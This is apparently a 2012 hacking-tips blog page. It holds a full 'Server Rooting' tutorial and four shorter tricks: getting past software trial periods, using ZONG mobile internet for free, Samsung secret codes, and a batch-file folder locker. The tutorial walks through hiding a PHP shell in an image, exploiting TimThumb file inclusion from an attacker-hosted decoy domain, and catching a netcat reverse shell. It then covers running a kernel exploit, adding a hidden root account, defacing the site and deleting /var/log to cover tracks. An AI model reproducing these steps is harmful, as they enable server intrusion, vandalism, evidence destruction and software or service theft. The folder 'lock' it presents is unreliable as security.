Pages

Wednesday, October 31, 2012

How we can run any trial software for ever

Main » Articles » Tricks "n" Tweaks » Useful Tips and Tricks







We can run any trial software for ever.
Strange!!!

Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.
When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.
So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.
NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.
For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments

Server Rooting


Today I decided to make a good start by creating this post-tutorial: Server Rooting

Everything you need to know….

Tools you need:

- Backtrack (Backtrack Website)
- Firefox (get it from here….) – Included in Backtrack and Ubuntu
- Netcat (Included in Backtrack)   — If you are on other linux enviroments get it from here….
- iCon2PHP (Get it from  DOWNLOAD NOW)
- A good shell (iCon2PHP Archive includes three great shells)
- A good VPN or Tor (More explanation below…..)
- Acunentix Web Vulnerability Scanner (Search for a cracked version at Google)

About the Tools:

Backtrack
– Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
– Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about "Hacky” addons for Firefox Here….
Netcat
– Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
– iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
– While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Maschines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speen is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
– Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

- – -  Before we begin  – - -

-Boot to Backtrack
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous while hacking
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.

The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg,jpg,gif….) This is the exactly same file but it confuses the uploader and thinks that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like "flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.
Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.

3. Root the Server:

Now that you have shelled your website we can start the proccess to root the server.
What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section "Rooting a server” you will have understood exactly what it is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1

SUCCESSFULLY ROOTED!

4. Deface the Website:

What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you have better to either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log

That is all hope u would have enjoyed it :D 

How to use Free internet on ZONG

hey........!!! frends i am telling about how can use free internet in your mobile with ZONG connection
its 2 simple Step:



Zong free Internet





















STEP: (1)  => Go Write Msg Option  type your: Mobile Company Name, Mobile Model, Internet 

And send Msg 131
 

=>>> PlzZ save your setting 
with code 1234

STEP: (2)  
=> And than Go Internet setting profile
Edit: APN
Change your APN setting; 


==>> Type this One
 

APN: Wapgw: 10.81.6.33
Use Free Internet & enjoy....

Samsung Mobile Secret Codes




samsung mobile secret codes

In this post I will be telling you guys some of Samsung Secret Codes or Secret Numbers. The Secret Codes/Numbers are as follows-

Software version: *#9999#
IMEI number: *#06#
Serial number: *#0001#
Display storage capacity: *#8999*636#
Display SIM card information: *#8999*778#
Show date and alarm clock: *#8999*782#
The display during warning: *#8999*786#
Samsung hardware version: *#8999*837#
Show network information: *#8999*638#
Display received channel number and received intensity: *#8999*9266#
Battery status- Memory capacity : *#9998*246#
Debug screen: *#9998*324# - *#8999*324#
LCD kontrast: *#9998*523#
Vibration test: *#9998*842# - *#8999*842#
Alarm beeper - Ringtone test : *#9998*289# - *#8999*289#
Smiley: *#9125#

Test Menu: *#8999*8378# 
GPSR Tool: *#4777*8665#
LCD Brightness: *#8999*523#
Error LOG Menu: *#8999*377# 
EEP Menu: *#8999*327#
Debug Mode: *#8999*667#
Software version: *#0837#
Display contrast: *#0523# - *#8999*523#
Battery info: *#0228# or *#8999*228# 
Firmware Version: *#1234# 
#*4773# Incremental Redundancy
#*7785# Reset wakeup & RTK timer cariables/variables
#*7200# Tone Generator Mute
#*3888# BLUETOOTH Test mode
#*7828# Task screen
#*#8377466# S/W Version & H/W Version
#*2562# Restarts Phone
#*2565# No Blocking? General Defense.
#*3353# General Defense, Code Erased.
#*3837# Phone Hangs on White screen.
#*3849# Restarts Phone
#*7337# Restarts Phone (Resets Wap Settings)
#*2886# AutoAnswer ON/OFF
#*7288# GPRS Detached/Attached
#*7287# GPRS Attached 
#*7666# White Screen 
#*7693# Sleep Deactivate/Activate 
#*2286# Databattery 
#*2527# GPRS switching set to (Class 4, 8, 9, 10) 
#*2679# Copycat feature Activa/Deactivate 
#*3940# External looptest 9600 bps 
#*4263# Handsfree mode Activate/Deactivate 
#*2558# Time ON 
#*3941# External looptest 115200 bps 
#*5176# L1 Sleep 
#*7462# SIM Phase 
#*7983# Voltage/Freq 
#*7986# Voltage 
#*8466# Old Time 
#*2255# Call Failed 
#*5376# DELETE ALL SMS!!!! 
#*6837# Official Software Version: (0003000016000702) 
#*2337# Permanent Registration Beep 
#*2474# Charging Duration 
#*2834# Audio Path (Handsfree) 
#*3270# DCS Support Activate/Deactivate 
#*3282# Data Activate/Deactivate 
#*3476# EGSM Activate/Deactivate 
#*3676# FORMAT FLASH VOLUME!!! 
#*4760# GSM Activate/Deactivate 
#*4864# White Screen 
#*7326# Accessory 
#*7683# Sleep variable 
#*3797# Blinks 3D030300 in RED 
#*7372# Resetting the time to DPB variables 
#*3273# EGPRS multislot (Class 4, 8, 9, 10) 
#*7722# RLC bitmap compression Activate/Deactivate 
#*2351# Blinks 1347E201 in RED 
#*2775# Switch to 2 inner speaker 
#*7878# FirstStartup (0=NO, 1=YES) 
#*3838# Blinks 3D030300 in RED 
#*2077# GPRS Switch 
#*2027# GPRS Switch 
#*0227# GPRS Switch 
#*0277# GPRS Switch 
#*22671# AMR REC START 
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr) 
#*22673# Pause REC 
#*22674# Resume REC 
#*22675# AMR Playback 
#*22676# AMR Stop Play 
#*22677# Pause Play 
#*22678# Resume Play 
#*77261# PCM Rec Req 
#*77262# Stop PCM Rec 
#*77263# PCM Playback 
#*77264# PCM Stop Play 
#*22679# AMR Get Time 
*#8999*364# Watchdog ON/OFF 
*#8999*427# WATCHDOG signal route setup
*2767*3855# = Full Reset (Caution every stored data will be deleted.)
*2767*2878# = Custom Reset 
*2767*927# = Wap Reset 
*2767*226372# = Camera Reset (deletes photos)
*2767*688# Reset Mobile TV 
#7263867# = RAM Dump (On or Off)
*#7465625# = Check the phone lock status 
*7465625*638*Code# = Enables Network lock 
#7465625*638*Code# = Disables Network lock 
*7465625*782*Code# = Enables Subset lock 
#7465625*782*Code# = Disables Subset lock 
*7465625*77*Code# = Enables SP lock 
#7465625*77*Code# = Disables SP lock 
*7465625*27*Code# = Enables CP lock 
#7465625*27*Code# = Disables CP lock 
*7465625*746*Code# = Enables SIM lock 
#7465625*746*Code# = Disables SIM lock 
*7465625*228# = Activa lock ON 
#7465625*228# = Activa lock OFF 
*7465625*28638# = Auto Network lock ON 
#7465625*28638# = Auto Network lock OFF 
*7465625*28782# = Auto subset lock ON 
#7465625*28782# = Auto subset lock OFF 
*7465625*2877# = Auto SP lock ON 
#7465625*2877# = Auto SP lock OFF 
*7465625*2827# = Auto CP lock ON 
#7465625*2827# = Auto CP lock OFF 
*7465625*28746# = Auto SIM lock ON 
#7465625*28746# = Auto SIM lock OFF

Lock Your Folder With Password Without Software


Folder Lock without any S/W



Open Notepad and copy the below code and save as locker.bat. At first time start it will create folder with Locker automatically for u. Don't forget to change your password in the code its shown the place where to type your password.

after creation of Locker folder again
click on the locker.bat.it will ask.press Y then Locker folder will be disappeared. again to get it click on locker.bat. and give ur password u will get the folder again.

************ ********* ********* ********* ********* ********* *

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
attrib +h +s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End 

********************************************

Another way to secure your folder.
To lock a folder ::: Simplest WaY !!!
To lock a folder ::: Simplest WaY !!!
Hi friends try this..


first select a folder for example i'll use a folder name movies in D drive D:\movies\
in the same drive u create a text file and type
ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
and save it as loc.bat
again u type in a notepad as 
ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
and save it as key.bat

now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and whn u double click key the control panel will change to normal folder..

Enjoy!! :D